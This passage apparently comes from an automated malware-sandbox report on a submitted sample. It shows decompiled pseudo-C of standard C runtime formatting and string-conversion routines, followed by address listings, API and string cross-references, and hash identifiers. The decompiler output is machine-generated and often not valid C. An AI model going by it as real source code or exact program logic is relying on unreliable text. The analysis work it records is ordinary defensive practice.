																						 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																						if( *(__ebp - 0x20) == 0) {
																							 *(__ebp - 0x30) = 0xa3;
																						} else {
																							__edx =  *(__ebp - 0x20);
																							 *(__ebp - 4) =  *(__ebp - 0x20);
																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																						}
																					}
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					__edx =  *(__ebp + 0x14);
																					__eax =  *(__edx - 8);
																					__ecx =  *(__edx - 4);
																					 *(__ebp - 0x490) =  *(__edx - 8);
																					 *(__ebp - 0x48c) =  *(__edx - 4);
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__edx =  *(__ebp - 0x2c);
																					_push( *(__ebp - 0x2c));
																					__eax =  *(__ebp - 0x30);
																					_push( *(__ebp - 0x30));
																					__ecx =  *(__ebp - 0x454);
																					_push( *(__ebp - 0x454));
																					__edx =  *(__ebp - 0x44);
																					_push( *(__ebp - 0x44));
																					__eax =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__ecx = __ebp - 0x490;
																					_push(__ebp - 0x490);
																					__edx =  *0x4bb808; // 0x776010b9
																					E00411D00(__edx) =  *__eax();
																					__esp = __esp + 0x1c;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__ecx =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__edx =  *0x4bb814; // 0x776010b9
																						E00411D00(__edx) =  *__eax();
																						__esp = __esp + 8;
																					}
																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__edx =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__eax =  *0x4bb810; // 0x776010b9
																							__eax =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__ecx =  *(__ebp - 4);
																					__edx =  *( *(__ebp - 4));
																					if( *( *(__ebp - 4)) == 0x2d) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
																					}
																					__edx =  *(__ebp - 4);
																					 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																					goto L187;
																				}
																				L124:
																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
																					goto L126;
																				}
																				L125:
																				 *(__ebp - 0x30) = 1;
																				goto L128;
																			}
																			L122:
																			 *(__ebp - 0x30) = 6;
																			goto L128;
																		case 6:
																			L69:
																			 *(__ebp - 0xc) = 1;
																			__ebp + 0x14 = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x458) = __ax;
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) & 0x00000020;
																			if(__ecx == 0) {
																				 *(__ebp - 0x448) =  *(__ebp - 0x458);
																			} else {
																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
																				 *(__ebp - 0x470) = __dl;
																				 *((char*)(__ebp - 0x46f)) = 0;
																				__ecx = __ebp - 0x40;
																				__eax = E004103A0(__ebp - 0x40);
																				__ecx = __ebp - 0x40;
																				E004103A0(__ebp - 0x40) =  *__eax;
																				__ecx =  *(__ebp - 0x448 + 0xac);
																				__edx = __ebp - 0x470;
																				__eax = __ebp - 0x448;
																				if(E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448) < 0) {
																					 *(__ebp - 0x28) = 1;
																				}
																			}
																			__edx = __ebp - 0x448;
																			 *(__ebp - 4) = __ebp - 0x448;
																			 *(__ebp - 0x24) = 1;
																			goto L187;
																		case 7:
																			goto L0;
																		case 8:
																			L106:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x484) = E0041F270(__ebp + 0x14);
																			if(E00424120() != 0) {
																				L116:
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) & 0x00000020;
																				if(__ecx == 0) {
																					__ecx =  *(__ebp - 0x484);
																					__edx =  *(__ebp - 0x44c);
																					 *__ecx =  *(__ebp - 0x44c);
																				} else {
																					__edx =  *(__ebp - 0x484);
																					__ax =  *(__ebp - 0x44c);
																					 *( *(__ebp - 0x484)) = __ax;
																				}
																				 *(__ebp - 0x28) = 1;
																				goto L187;
																			}
																			L107:
																			__ecx = 0;
																			if(0 == 0) {
																				 *(__ebp - 0x4f4) = 0;
																			} else {
																				 *(__ebp - 0x4f4) = 1;
																			}
																			__edx =  *(__ebp - 0x4f4);
																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
																			if( *(__ebp - 0x488) == 0) {
																				_push(L"(\"\'n\' format specifier disabled\", 0)");
																				_push(0);
																				_push(0x695);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				__eax = L0040C820();
																				__esp = __esp + 0x14;
																				if(__eax == 1) {
																					asm("int3");
																				}
																			}
																			if( *(__ebp - 0x488) != 0) {
																				L115:
																				goto L187;
																			} else {
																				L114:
																				 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																				__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																				 *(__ebp - 0x4cc) = 0xffffffff;
																				__ecx = __ebp - 0x40;
																				__eax = E00410370(__ecx);
																				__eax =  *(__ebp - 0x4cc);
																				goto L225;
																			}
																		case 9:
																			L148:
																			 *(__ebp - 8) = 8;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
																			}
																			goto L150;
																		case 0xa:
																			L142:
																			 *(__ebp - 0x30) = 8;
																			goto L143;
																		case 0xb:
																			L84:
																			if( *(__ebp - 0x30) != 0xffffffff) {
																				__edx =  *(__ebp - 0x30);
																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
																			} else {
																				 *(__ebp - 0x4f0) = 0x7fffffff;
																			}
																			__eax =  *(__ebp - 0x4f0);
																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																				L98:
																				if( *(__ebp - 4) == 0) {
																					__ecx =  *0x4bc064; // 0x408104
																					 *(__ebp - 4) = __ecx;
																				}
																				 *(__ebp - 0xc) = 1;
																				__edx =  *(__ebp - 4);
																				 *(__ebp - 0x480) =  *(__ebp - 4);
																				while(1) {
																					L101:
																					__eax =  *(__ebp - 0x47c);
																					__ecx =  *(__ebp - 0x47c);
																					__ecx =  *(__ebp - 0x47c) - 1;
																					 *(__ebp - 0x47c) = __ecx;
																					if( *(__ebp - 0x47c) == 0) {
																						break;
																					}
																					L102:
																					__edx =  *(__ebp - 0x480);
																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
																						break;
																					}
																					L103:
																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
																				}
																				L104:
																				 *(__ebp - 0x480) =  *(__ebp - 0x480) -  *(__ebp - 4);
																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
																				 *(__ebp - 0x24) =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
																				goto L105;
																			} else {
																				L88:
																				if( *(__ebp - 4) == 0) {
																					__eax =  *0x4bc060; // 0x408114
																					 *(__ebp - 4) = __eax;
																				}
																				__ecx =  *(__ebp - 4);
																				 *(__ebp - 0x478) = __ecx;
																				 *(__ebp - 0x24) = 0;
																				while(1) {
																					L92:
																					__eax =  *(__ebp - 0x24);
																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
																						break;
																					}
																					L93:
																					__ecx =  *(__ebp - 0x478);
																					__edx =  *__ecx;
																					if( *__ecx == 0) {
																						break;
																					}
																					L94:
																					__ecx = __ebp - 0x40;
																					E004103A0(__ebp - 0x40) =  *(__ebp - 0x478);
																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
																					if(E00420DA0( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478)) != 0) {
																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																					}
																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
																				}
																				L97:
																				L105:
																				goto L187;
																			}
																		case 0xc:
																			L141:
																			 *(__ebp - 8) = 0xa;
																			goto L150;
																		case 0xd:
																			L144:
																			 *((intOrPtr*)(__ebp - 0x460)) = 0x27;
																			L145:
																			 *(__ebp - 8) = 0x10;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				__edx = 0x30;
																				 *((short*)(__ebp - 0x14)) = __dx;
																				 *((intOrPtr*)(__ebp - 0x460)) =  *((intOrPtr*)(__ebp - 0x460)) + 0x51;
																				 *(__ebp - 0x12) = __ax;
																				 *(__ebp - 0x1c) = 2;
																			}
																			goto L150;
																		case 0xe:
																			goto L187;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0042383b
0x0042383b
0x0042383b
0x0042383b
0x00423841
0x00423844
0x00000000
0x004238c2
0x00000000
0x004238c2
0x00000000
0x004238c2
0x004238c2
0x004238ca
0x004238ec
0x004238f2
0x00423917
0x0042395e
0x00423961
0x00423982
0x00423987
0x0042398c
0x00423992
0x00423963
0x00423967
0x0042396c
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391f
0x00423941
0x00423946
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423925
0x0042392a
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f8
0x004238fd
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238d0
0x004238d5
0x004238d8
0x004238de
0x004238de
0x0042399e
0x004239e0
0x004239e6
0x004239f2
0x00000000
0x004239a0
0x004239a0
0x004239a0
0x004239a7
0x00000000
0x004239b4
0x004239b4
0x004239c2
0x004239c7
0x004239cd
0x004239db
0x004239f8
0x00423a00
0x00423a22
0x00423a22
0x00423a2c
0x00423a3d
0x00423a47
0x00423a49
0x00423a49
0x00423a2e
0x00423a2e
0x00423a2e
0x00423a5c
0x00423a5e
0x00423a5e
0x00423a6b
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7c
0x00000000
0x00000000
0x00423a8c
0x00423a8f
0x00423a99
0x00423aa8
0x00423ab1
0x00423ac7
0x00423acd
0x00423ada
0x00423ae8
0x00423ae8
0x00423af7
0x00423aff
0x00423aff
0x00423b07
0x00423b10
0x00423b19
0x00423b25
0x00423b3e
0x00423b44
0x00423b4d
0x00423b4d
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00000000
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00423d30
0x00423d34
0x00423d3c
0x00423d41
0x00423d44
0x00423d44
0x00423d4b
0x00423d4b
0x00422ecb
0x00422ed2
0x00422edf
0x00422ee4
0x00000000
0x00422ef7
0x00422f01
0x00422f28
0x00422f0f
0x00422f20
0x00422f20
0x00422f01
0x00422f32
0x00422f38
0x00422f44
0x00422f47
0x00422f55
0x00422f58
0x00422f65
0x0042300a
0x00423010
0x0042301d
0x00000000
0x00000000
0x00423023
0x00423029
0x00000000
0x00423030
0x00423030
0x0042304a
0x0042304f
0x00000000
0x00000000
0x00423057
0x00423057
0x0042305e
0x00423061
0x00423064
0x00423067
0x0042306a
0x0042306d
0x00423070
0x00423077
0x0042307e
0x00000000
0x00000000
0x0042308a
0x0042308a
0x00423091
0x0042309d
0x004230a0
0x004230ad
0x00000000
0x00000000
0x004230af
0x004230b5
0x004230b5
0x004230bc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423100
0x00423100
0x0042310a
0x00423137
0x00423141
0x00423141
0x00423145
0x0042310c
0x0042310c
0x00423118
0x0042311f
0x00423124
0x00423127
0x0042312a
0x0042312d
0x0042312f
0x0042312f
0x00423132
0x00000000
0x00000000
0x0042314d
0x0042314d
0x00000000
0x00000000
0x00423159
0x00423159
0x00423163
0x00423183
0x00423186
0x00423190
0x00423190
0x00423194
0x00423165
0x00423165
0x00423171
0x00423178
0x0042317a
0x0042317a
0x00423181
0x00000000
0x00000000
0x0042319c
0x0042319c
0x004231a3
0x004231af
0x004231b2
0x004231bf
0x004232d2
0x00000000
0x004232d2
0x004231c5
0x004231cb
0x004231cb
0x004231d2
0x00000000
0x00423209
0x00423209
0x0042320c
0x00423212
0x00423239
0x00423239
0x0042323c
0x00423242
0x00423266
0x00423266
0x00423269
0x0042326f
0x004232a8
0x004232b9
0x00000000
0x004232b9
0x00423271
0x00423271
0x00423274
0x0042327a
0x00000000
0x00000000
0x0042327c
0x0042327c
0x0042327f
0x00423285
0x00000000
0x00000000
0x00423287
0x00423287
0x0042328a
0x00423290
0x00000000
0x00000000
0x00423292
0x00423292
0x00423295
0x0042329b
0x00000000
0x00000000
0x0042329d
0x0042329d
0x004232a0
0x004232a6
0x004232aa
0x00000000
0x004232aa
0x00000000
0x004232a6
0x00423244
0x00423244
0x00423247
0x0042324e
0x00000000
0x00423250
0x00423253
0x00423256
0x0042325c
0x00423261
0x00000000
0x00423261
0x0042324e
0x00423214
0x00423214
0x00423217
0x0042321e
0x00000000
0x00423220
0x00423223
0x00423226
0x0042322c
0x00423231
0x00000000
0x00423231
0x00000000
0x004232bb
0x004232bb
0x004232be
0x004232c1
0x00000000
0x00000000
0x004231d9
0x004231d9
0x004231dc
0x004231e2
0x004231fe
0x00423201
0x004231e4
0x004231e4
0x004231e7
0x004231ea
0x004231f0
0x004231f6
0x004231f6
0x00000000
0x00000000
0x004232c6
0x004232c9
0x004232cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004230d9
0x004230d9
0x004230dc
0x004230df
0x00000000
0x00000000
0x004230e4
0x004230e7
0x004230ed
0x00000000
0x00000000
0x004230ce
0x004230d1
0x004230d4
0x00000000
0x00000000
0x004230c3
0x004230c6
0x004230c9
0x00000000
0x00000000
0x004230f2
0x004230f5
0x004230f8
0x00000000
0x00000000
0x004230fb
0x00000000
0x00000000
0x00422f6b
0x00422f6b
0x00422f6d
0x00422f7b
0x00422f6f
0x00422f6f
0x00422f6f
0x00422f8b
0x00422f98
0x00422f9a
0x00422f9f
0x00422fa1
0x00422fa6
0x00422fab
0x00422fad
0x00422fb2
0x00422fb8
0x00422fba
0x00422fba
0x00422fb8
0x00422fbb
0x00422fc2
0x00000000
0x00422fc4
0x00422fc9
0x00422fe5
0x00422fed
0x00422ffa
0x00422fff
0x00423e14
0x00423e21
0x00423e21
0x00422fc2
0x00422f65
0x00423d50
0x00423d57
0x00423d6e
0x00423d62
0x00423d62
0x00423d62
0x00423d78
0x00423d7e
0x00423d8b
0x00423d8d
0x00423d92
0x00423d94
0x00423d99
0x00423d9e
0x00423da0
0x00423da5
0x00423dab
0x00423dad
0x00423dad
0x00423dab
0x00423db5
0x00423e00
0x00423e09
0x00423e0e
0x00423db7
0x00423dbc
0x00423dd8
0x00423de0
0x00423ded
0x00423df2
0x00423df2
0x00000000
0x00423db5
0x00423b5a
0x00423b60
0x00423b6a
0x00423b84
0x00423b9e
0x00423ba5
0x00423ba9
0x00423ba9
0x00423b86
0x00423b8b
0x00423b8f
0x00423b8f
0x00423b6c
0x00423b71
0x00423b75
0x00423b75
0x00423b6a
0x00423bb9
0x00423bc5
0x00423bdb
0x00423be0
0x00423be0
0x00423bf6
0x00423bfb
0x00423c04
0x00423c22
0x00423c27
0x00423c27
0x00423c2e
0x00423ce8
0x00423cfb
0x00423d00
0x00000000
0x00423c3e
0x00423c3e
0x00423c41
0x00423c4a
0x00423c50
0x00423c50
0x00423c5f
0x00423c67
0x00000000
0x00000000
0x00423c69
0x00423c6c
0x00423c91
0x00423c96
0x00423c99
0x00423ca6
0x00423cb4
0x00423cc7
0x00423ccc
0x00423cdb
0x00000000
0x00423cdb
0x00423ca8
0x00423ca8
0x00000000
0x00423ca8
0x00423ce6
0x00423d03
0x00423d0a
0x00423d28
0x00423d2d
0x00423d2d
0x00000000
0x00423d0a
0x004232d7
0x004232d7
0x004232de
0x004232e4
0x004232ea
0x004232ed
0x004232f3
0x00423300
0x00423306
0x00423306
0x0042330d
0x00000000
0x00423691
0x00423691
0x0042369f
0x004236a2
0x00000000
0x00000000
0x00423314
0x00423317
0x0042331d
0x00423322
0x00423325
0x00423325
0x00000000
0x00000000
0x0042345a
0x0042345d
0x00423462
0x00423467
0x0042346a
0x0042346a
0x00000000
0x00000000
0x0042385d
0x0042385d
0x00000000
0x00000000
0x004233c4
0x004233c4
0x004233d0
0x004233dd
0x004233eb
0x004233eb
0x004233f1
0x004233f4
0x00423400
0x00423455
0x00000000
0x00423455
0x004233df
0x004233df
0x004233e9
0x00423405
0x00423408
0x0042340e
0x00423436
0x0042343d
0x00423443
0x00423446
0x00423449
0x0042344f
0x00423452
0x00423410
0x00423410
0x00423416
0x00423419
0x0042341c
0x00423422
0x00423425
0x00423428
0x0042342a
0x0042342d
0x0042342d
0x00000000
0x0042340e
0x00000000
0x00000000
0x004236a9
0x004236ac
0x004236af
0x004236b2
0x004236b8
0x004236bb
0x004236c6
0x004236d1
0x004236d5
0x004236ec
0x004236f3
0x004236f5
0x004236f5
0x004236fc
0x00423703
0x00423711
0x00423714
0x00423723
0x0042372a
0x0042373f
0x0042372c
0x0042372c
0x0042372f
0x00423735
0x0042373a
0x0042373a
0x0042372a
0x00423749
0x0042374c
0x0042374f
0x00423752
0x00423755
0x00423758
0x0042375e
0x00423764
0x0042376c
0x0042376d
0x00423770
0x00423771
0x00423774
0x00423775
0x0042377c
0x0042377d
0x00423780
0x00423781
0x00423784
0x00423785
0x0042378b
0x0042378c
0x0042379b
0x0042379d
0x004237a3
0x004237a8
0x004237b0
0x004237b8
0x004237b9
0x004237bc
0x004237bd
0x004237cc
0x004237ce
0x004237ce
0x004237d1
0x004237db
0x004237e0
0x004237e6
0x004237e8
0x004237f0
0x004237f1
0x004237f4
0x004237f5
0x00423803
0x00423805
0x00423805
0x004237e6
0x00423808
0x0042380b
0x00423811
0x00423816
0x0042381b
0x00423821
0x00423824
0x00423824
0x00423827
0x00423833
0x00000000
0x00423833
0x004236d7
0x004236d7
0x004236e1
0x00000000
0x00000000
0x004236e3
0x004236e3
0x00000000
0x004236e3
0x004236c8
0x004236c8
0x00000000
0x00000000
0x00423328
0x00423328
0x00423333
0x0042333b
0x00423342
0x00423345
0x00423348
0x004233a8
0x0042334a
0x00423351
0x00423357
0x0042335d
0x00423364
0x00423367
0x0042336d
0x00423375
0x00423377
0x0042337e
0x00423385
0x00423396
0x00423398
0x00423398
0x0042339f
0x004233af
0x004233b5
0x004233b8
0x00000000
0x00000000
0x00000000
0x00000000
0x0042359a
0x0042359a
0x004235a6
0x004235b3
0x0042365d
0x0042365d
0x00423660
0x00423663
0x00423677
0x0042367d
0x00423683
0x00423665
0x00423665
0x0042366b
0x00423672
0x00423672
0x00423685
0x00000000
0x00423685
0x004235b9
0x004235b9
0x004235bb
0x004235c9
0x004235bd
0x004235bd
0x004235bd
0x004235d3
0x004235d9
0x004235e6
0x004235e8
0x004235ed
0x004235ef
0x004235f4
0x004235f9
0x004235fb
0x00423600
0x00423606
0x00423608
0x00423608
0x00423606
0x00423610
0x00423658
0x00000000
0x00423612
0x00423612
0x00423617
0x00423633
0x0042363b
0x00423645
0x00423648
0x0042364d
0x00000000
0x0042364d
0x00000000
0x004238a4
0x004238a4
0x004238ae
0x004238b4
0x004238b9
0x004238bf
0x004238bf
0x00000000
0x00000000
0x00423856
0x00423856
0x00000000
0x00000000
0x0042346d
0x00423471
0x0042347f
0x00423482
0x00423473
0x00423473
0x00423473
0x00423488
0x0042348e
0x00423494
0x004234a0
0x004234a6
0x004234a9
0x00423531
0x00423535
0x00423537
0x0042353d
0x0042353d
0x00423540
0x00423547
0x0042354a
0x00423550
0x00423550
0x00423550
0x00423556
0x0042355c
0x0042355f
0x00423567
0x00000000
0x00000000
0x00423569
0x00423569
0x0042356f
0x00423574
0x00000000
0x00000000
0x00423576
0x0042357c
0x0042357f
0x0042357f
0x00423587
0x0042358d
0x00423590
0x00423592
0x00000000
0x004234af
0x004234af
0x004234b3
0x004234b5
0x004234ba
0x004234ba
0x004234bd
0x004234c0
0x004234c6
0x004234d8
0x004234d8
0x004234d8
0x004234e1
0x00000000
0x00000000
0x004234e3
0x004234e3
0x004234e9
0x004234ee
0x00000000
0x00000000
0x004234f0
0x004234f0
0x004234f9
0x004234ff
0x0042350d
0x00423515
0x00423518
0x00423518
0x00423524
0x00423527
0x004234d2
0x004234d5
0x004234d5
0x0042352f
0x00423595
0x00000000
0x00423595
0x00000000
0x0042384d
0x0042384d
0x00000000
0x00000000
0x00423869
0x00423869
0x00423873
0x00423873
0x0042387d
0x00423883
0x00423885
0x0042388a
0x00423894
0x00423897
0x0042389b
0x0042389b
0x00000000
0x00000000
0x00000000
0x00000000
0x0042330d
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x004239a7
0x0042399e
0x004238c2
0x004238c2
0x004238c2

APIs

_get_int64_arg.LIBCMTD ref: 004238D0
_get_int64_arg.LIBCMTD ref: 004238F8
__aullrem.LIBCMT ref: 00423AA0
__aulldiv.LIBCMT ref: 00423AC2
_write_multi_char.LIBCMTD ref: 00423BDB
_write_string.LIBCMTD ref: 00423BF6
_write_multi_char.LIBCMTD ref: 00423C22
__mbtowc_l.LIBCMTD ref: 00423C91

Strings

_woutput_s_l, xrefs: 00422FDB
9, xrefs: 00423AD3
("Incorrect format specifier", 0), xrefs: 00422F9A, 00422FE0
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c, xrefs: 00422FA6, 00422FD6

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
API String ID: 3455034128-2408376751
Opcode ID: e2c17c1b6871a6a3df259f7f28d7e19e8363fd5483099b0254769256fec3d646
Instruction ID: 6a17f97cb84dcbfaa84aa5d203f0530efd6e9bcbfbcd35ea2c9e612ab27f2722
Opcode Fuzzy Hash: e2c17c1b6871a6a3df259f7f28d7e19e8363fd5483099b0254769256fec3d646
Instruction Fuzzy Hash: F8F16BB1E002299FDF24CF55DC81BAEB7B0BB45305F5041EAE149AB241D778AE84CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA23 Relevance: 33.3, APIs: 22, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041DA23() {
				intOrPtr* _t143;
				signed int* _t145;
				int _t150;
				intOrPtr* _t167;
				intOrPtr _t189;
				void* _t206;
				intOrPtr _t223;
				intOrPtr _t230;
				void* _t272;
				void* _t273;
				signed int _t274;

				if( *(_t274 + 8) == 0) {
					_t143 = E004103A0(_t274 - 0x20);
					_t208 =  *_t143;
					if( *((intOrPtr*)( *_t143 + 0x14)) != 0) {
						_t210 = _t274 - 0x20;
						_t145 = E004103A0(_t274 - 0x20);
						_t256 =  *_t145;
						 *(_t274 - 4) = WideCharToMultiByte( *( *_t145 + 4), 0,  *(_t274 + 0xc), 0xffffffff, 0, 0, 0, _t274 - 0x10);
						if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
							 *((intOrPtr*)(L00411810(_t210))) = 0x2a;
							 *(_t274 - 0x68) = 0xffffffff;
							E00410370(_t274 - 0x20);
							_t150 =  *(_t274 - 0x68);
						} else {
							 *(_t274 - 0x6c) =  *(_t274 - 4) - 1;
							E00410370(_t274 - 0x20);
							_t150 =  *(_t274 - 0x6c);
						}
					} else {
						_t256 =  *(_t274 + 0xc);
						 *(_t274 - 0x64) = E00413C50(_t208,  *(_t274 + 0xc));
						E00410370(_t274 - 0x20);
						_t150 =  *(_t274 - 0x64);
					}
					L47:
					return E00410900(_t150, _t206,  *(_t274 - 0x24) ^ _t274, _t256, _t272, _t273);
				}
				if( *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t274 - 0x20))) + 0x14)) != 0) {
					if( *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t274 - 0x20))) + 0xac)) != 1) {
						_t223 =  *((intOrPtr*)(E004103A0(_t274 - 0x20)));
						_t256 =  *(_t223 + 4);
						 *(_t274 - 4) = WideCharToMultiByte( *(_t223 + 4), 0,  *(_t274 + 0xc), 0xffffffff,  *(_t274 + 8),  *(_t274 + 0x10), 0, _t274 - 0x10);
						if( *(_t274 - 4) == 0 ||  *(_t274 - 0x10) != 0) {
							if( *(_t274 - 0x10) != 0 || GetLastError() != 0x7a) {
								 *((intOrPtr*)(L00411810(_t223))) = 0x2a;
								 *(_t274 - 0x4c) = 0xffffffff;
								E00410370(_t274 - 0x20);
								_t150 =  *(_t274 - 0x4c);
							} else {
								while( *(_t274 - 4) <  *(_t274 + 0x10)) {
									_t167 = E004103A0(_t274 - 0x20);
									_t230 =  *((intOrPtr*)(E004103A0(_t274 - 0x20)));
									_t256 =  *(_t230 + 4);
									 *((intOrPtr*)(_t274 - 0xc)) = WideCharToMultiByte( *(_t230 + 4), 0,  *(_t274 + 0xc), 1, _t274 - 0x2c,  *( *_t167 + 0xac), 0, _t274 - 0x10);
									if( *((intOrPtr*)(_t274 - 0xc)) == 0 ||  *(_t274 - 0x10) != 0) {
										 *((intOrPtr*)(L00411810(_t230))) = 0x2a;
										 *(_t274 - 0x50) = 0xffffffff;
										E00410370(_t274 - 0x20);
										_t150 =  *(_t274 - 0x50);
									} else {
										if( *((intOrPtr*)(_t274 - 0xc)) < 0 ||  *((intOrPtr*)(_t274 - 0xc)) > 5) {
											 *((intOrPtr*)(L00411810(_t230))) = 0x2a;
											 *(_t274 - 0x54) = 0xffffffff;
											E00410370(_t274 - 0x20);
											_t150 =  *(_t274 - 0x54);
										} else {
											if( *(_t274 - 4) +  *((intOrPtr*)(_t274 - 0xc)) <=  *(_t274 + 0x10)) {
												 *(_t274 - 8) = 0;
												while( *(_t274 - 8) <  *((intOrPtr*)(_t274 - 0xc))) {
													( *(_t274 + 8))[ *(_t274 - 4)] =  *((intOrPtr*)(_t274 +  *(_t274 - 8) - 0x2c));
													_t256 =  &(( *(_t274 + 8))[ *(_t274 - 4)]);
													if(( *(_t274 + 8))[ *(_t274 - 4)] != 0) {
														 *(_t274 - 8) =  *(_t274 - 8) + 1;
														 *(_t274 - 4) =  *(_t274 - 4) + 1;
														continue;
													}
													 *(_t274 - 0x5c) =  *(_t274 - 4);
													E00410370(_t274 - 0x20);
													_t150 =  *(_t274 - 0x5c);
													goto L47;
												}
												_t256 =  &(( *(_t274 + 0xc))[1]);
												 *(_t274 + 0xc) =  &(( *(_t274 + 0xc))[1]);
												continue;
											}
											 *(_t274 - 0x58) =  *(_t274 - 4);
											E00410370(_t274 - 0x20);
											_t150 =  *(_t274 - 0x58);
										}
									}
									goto L47;
								}
								 *(_t274 - 0x60) =  *(_t274 - 4);
